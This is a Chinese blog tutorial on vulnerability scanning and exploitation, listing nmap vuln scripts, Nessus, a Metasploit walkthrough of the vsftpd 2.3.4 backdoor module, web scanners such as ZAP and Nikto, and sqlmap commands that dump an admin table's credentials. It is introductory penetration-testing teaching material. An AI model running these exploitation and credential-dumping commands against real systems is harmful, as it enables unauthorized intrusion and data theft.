首页
技术博客
PHP教程
数据库技术
前端开发
HTML5
Nginx
php论坛
新用户注册
|
会员登录
PHP教程
技术博客
编程问答
PNG素材
编程语言
前端技术
Android
PHP教程
HTML5教程
数据库
Linux技术
Nginx技术
PHP安全
WebSerer
职场攻略
JavaScript
开放平台
业界资讯
大话程序猿
登录
极速注册
取消
热门标签 | HotTags
cookie
search
golang
loops
vbscript
md5
match
yaml
hook
dockerfile
dagger
tree
merge
utf-8
bytecode
usb
integer
process
export
object
javascript
request
hashtable
settings
grid
list
js
install
ip
substring
triggers
function
split
lua
datetime
runtime
java
hash
c语言
express
frameworks
python3
httprequest
filter
sum
go
fetch
cPlusPlus
bash
callback
stream
scala
version
cmd
php5
solr
format
uri
heatmap
perl
byte
char
emoji
input
jsp
import
string
tags
bit
buffer
erlang
chat
php
php7
cSharp
text
spring
flutter
config
当前位置:
开发笔记
>
编程语言
> 正文
六、漏洞扫描
作者:客官真的真的不可以 | 来源:互联网 | 2023-08-31 01:26
系统漏洞扫描漏洞扫描原理漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描,需要对扫描结果进行漏洞验证扫描器原理大致相同
系统漏洞扫描
漏洞扫描原理
漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描,需要对扫描结果进行漏洞验证
扫描器原理大致相同,都是通过发送对应的验证数据到目标具体服务进行验证。到收到响应与存在漏洞的响应一致时,就表明存在漏洞
漏洞扫描工具-Nmap
nmap --script vuln 目标IP地址
漏洞扫描工具-nessus
漏洞利用metasploit
利用Metasploit对扫描到的漏洞加以利用 以vsftpd2.3.4为例
Kali 进入metasploit
msfconsole(建议msfdb run)
查找漏洞
search vsftpd
使用漏洞
use exploit/unix/ftp/vsftpd 234 backdoor
查看需要设置的参数
show options
查看可利用的攻击模块
show payloads
set 攻击模块名–设置攻击模块
set rhosts IP地址(攻击目标的IP)
攻击
exploit/run
Web程序漏洞扫描
针对Web应用程序的漏洞扫描其实就是每个扫描器读取自己的Payload进行探测
Web漏洞扫描器
Owasp-zap
AWVS
Appscan
Nikto
Burpsuite
每个扫描器都有各自不同的Payload进行探测
OWASP-ZAP漏洞扫描
OWASP-ZAP是OWASP组织开发的用于Web应用程序漏洞扫描器。免费开源,不断更新维护
nikto漏洞扫描
对目标服务器进行漏洞扫描。主要针对HTTP服务器
nilto --host IP地址
漏洞利用
使用sqlmap对扫描到的Sql注入漏洞进行利用
sqlmap -u “漏洞的URL”
sqlmap -u “漏洞URL” --tables (爆表,假设爆出的表名admin)
sqlmap -u “漏洞URL” -T admin --columns (爆admin表的列名,假设admin,password)
sqlmap -u “漏洞URL” -T admin -C “admin, password” --dump (获取对应的数据)
漏洞
ip
sftp
console
search
unix
ftp
io
web
写下你的评论吧 !
吐个槽吧,看都看了
会员登录
|
用户注册
推荐阅读
ip
使用cacti监控mssql 2005运行资源情况的操作步骤
本文介绍了使用cacti监控mssql 2005运行资源情况的操作步骤,包括安装必要的工具和驱动,测试mssql的连接,配置监控脚本等。通过php连接mssql来获取SQL 2005性能计算器的值,实现对mssql的监控。详细的操作步骤和代码请参考附件。 ...
[详细]
蜡笔小新 2023-12-12 13:57:58
ip
揭秘阿里云WAF背后神秘的AI智能防御体系
背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ...
[详细]
蜡笔小新 2023-12-11 01:30:52
ip
浅解XXE与Portswigger Web Sec
XXE与PortswiggerWebSec相关链接:博客园安全脉搏FreeBufXML的全称为XML外部实体注入,在学习的过程中发现有回显的XXE并不多,而 ...
[详细]
蜡笔小新 2023-10-17 16:52:48
ip
Nginx使用AWStats日志分析的步骤及注意事项
本文介绍了在Centos7操作系统上使用Nginx和AWStats进行日志分析的步骤和注意事项。通过AWStats可以统计网站的访问量、IP地址、操作系统、浏览器等信息,并提供精确到每月、每日、每小时的数据。在部署AWStats之前需要确认服务器上已经安装了Perl环境,并进行DNS解析。 ...
[详细]
蜡笔小新 2023-12-14 19:42:01
ip
Metasploit攻击渗透实践
本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ...
[详细]
蜡笔小新 2023-12-14 12:14:09
list
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)
本文介绍了使用postman进行接口测试的方法,以测试用户管理模块为例。首先需要下载并安装postman,然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时,可以进行异常测试,包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ...
[详细]
蜡笔小新 2023-12-14 10:29:45
ip
Webmin远程命令执行漏洞复现及防护方法
本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ...
[详细]
蜡笔小新 2023-12-13 16:14:53
ip
如何在服务器主机上实现文件共享的方法和工具
本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ...
[详细]
蜡笔小新 2023-12-13 13:23:48
js
如何限制php数据库链接数和连接超时时间?
本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ...
[详细]
蜡笔小新 2023-12-14 14:06:10
object
阿里云物联网 .NET Core 客户端 | CZGL.AliIoTClient:4. 设备上报属性
阿,里,云,物,联网,net,core,客户端,czgl,aliiotclient, ...
[详细]
蜡笔小新 2023-12-14 12:40:20
ip
操作系统的定义和功能
本文介绍了操作系统的定义和功能,包括操作系统的本质、用户界面以及系统调用的分类。同时还介绍了进程和线程的区别,包括进程和线程的定义和作用。 ...
[详细]
蜡笔小新 2023-12-11 14:17:13
install
Linux下安装免费杀毒软件ClamAV及使用方法
本文介绍了在Linux系统下安装免费杀毒软件ClamAV的方法,并提供了使用该软件更新病毒库和进行病毒扫描的指令参数。同时还提供了官方安装文档和下载地址。 ...
[详细]
蜡笔小新 2023-12-10 14:10:51
search
PostgreSQL OR条件
PostgreSQLOR条件与WHERE子句一起使用,以从表中的一列或多列列中选择唯一数据。语法 ...
[详细]
蜡笔小新 2023-12-09 19:08:09
js
node . js urlsearchparams API
node.jsurlsearchparamsAPI哎哎哎 ...
[详细]
蜡笔小新 2023-12-09 18:08:10
list
【重识云原生】第四章云网络4.8.3.2节——Open vSwitch工作原理详解
2OpenvSwitch架构2.1OVS整体架构ovs-vswitchd:守护程序,实现交换功能,和Linux内核兼容模块一起,实现基于流的交换flow-basedswitchin ...
[详细]
蜡笔小新 2023-12-09 10:34:07
客官真的真的不可以
这个家伙很懒,什么也没留下!
Tags | 热门标签
cookie
search
golang
loops
vbscript
md5
match
yaml
hook
dockerfile
dagger
tree
merge
utf-8
bytecode
usb
integer
process
export
object
javascript
request
hashtable
settings
grid
list
js
install
ip
substring
RankList | 热门文章
1
SQL 常用优化手段总结分析 SQL 语句的一般步骤
2
Python | Pandas index . get _ values()
3
android的Design包里面的一些控件的应用
4
Redis中主从复制的原理详解
5
win7任务管理器pid怎么显示_win7任务管理器pid设置方法
6
解决AS3请求数据的“安全沙箱冲突”问题
7
从迭代器模式到迭代协议
8
通过tomcat访问本地服务器上的图片
9
[转]10个日常Docker使用技巧
10
Linux下递归遍历目录和文件
11
运行下一个js时出错TypeError:(0,react_jsx_dev_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxDEV)不是函数
12
41、auto、decltype和decltype(auto)的用法
13
iOS 环信离线推送
14
如何将Angular2开发的项目迁移到小程序上?
15
JAVA魏一帆_模特新秀魏一帆——在绘画和走秀领域双面开花
PHP1.CN | 中国最专业的PHP中文社区 |
DevBox开发工具箱
|
json解析格式化
|
PHP资讯
|
PHP教程
|
数据库技术
|
服务器技术
|
前端开发技术
|
PHP框架
|
开发工具
|
在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved |
京公网安备 11010802041100号
|
京ICP备19059560号-4
| PHP1.CN 第一PHP社区 版权所有